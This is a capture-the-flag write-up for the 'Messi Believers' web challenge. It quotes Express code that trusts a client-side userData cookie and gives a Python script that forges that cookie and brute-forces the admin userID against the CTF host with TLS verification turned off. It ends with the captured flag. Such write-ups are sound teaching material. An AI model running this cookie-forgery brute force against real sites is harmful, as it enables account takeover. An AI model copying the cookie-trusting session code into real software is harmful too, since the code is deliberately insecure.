Tags: web idor authentication
Rating:
# Messi Believers
Given a zip file `messifans.zip` and simple web page with login functionality. Extract the zip and we got some source files of the web, `app.js` is interesting:
```js
const users = [
{
userID: "972",
username: "CR7Junior",
password: "Messiteamo"
},
{
userID: "REDACTED",
username: "admin"
}
]
app.get("/", (req, res) => {
const adm = users.find(u => u.username === "admin")
if(req.cookies && req.cookies.userData && req.cookies.userData.userID) {
const {userID, username} = req.cookies.userData
if(req.cookies.userData.userID === adm.userID) res.render("home.ejs", {username: username, flag: process.env.FLAG})
else res.render("home.ejs", {username: username, flag: "No flag for u!"})
} else {
res.render("noauth.ejs")
}
})
```
We have some hardcoded credentials, `CR7Junior:Messiteamo` and `admin:unknownpassword`. Try to login with `CR7Junior:Messiteamo`. Logged in and it gave us a cookie with `userData` as name and `j%3A%7B%22userID%22%3A%22972%22%2C%22username%22%3A%22CR7Junior%22%7D` as its value. Looking at code snippet above, we can see that session handling is 100% rely on cookie and the cookie is basically `j:{"userID":"972","username":"CR7Junior"}` (in URL-decoded format) which is very guessable. So if we knew what is the `userId` of `admin` it will print us the flag, however it is written as `REDACTED` on the snippet. The solution is to guess the `userID` with brute force attack. Trial and error, first I try `0` to `999` but it failed. Next I try `000` to `999` because maybe it has to be a 3 digits numeric value, but it failed too. Last, I try `1000` to `10000` and it is a great success. You can see my code below, I piped it into `grep` since I just want the flag so I really don't know what exactly is the `userID` but it's somewhere in that range. Also, I tried multithreading but it constantly gave me errors, so it takes time to solve this one.
```python
#!/usr/bin/env python3
import requests
# There are some SSL warnings so I wrote these 2 lines to just get rid of it
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
url = 'https://messifans.ctf.cert.unlp.edu.ar/'
for x in range(1000,10000):
brute = 'j%3A%7B%22userID%22%3A%22{}%22%2C%22username%22%3A%22admin%22%7D'.format(x)
cookies = {'userData': brute}
resp = requests.get(url, cookies=cookies, verify=False)
print(resp.text)
```
Output:
```
...
CTF No flag for u!
CTF No flag for u!
CTF No flag for u!
CTF flag{c00K1eee_m0nst3r_n00B}
CTF No flag for u!
CTF No flag for u!
CTF No flag for u!
**FLAG: flag{c00K1eee_m0nst3r_n00B}**
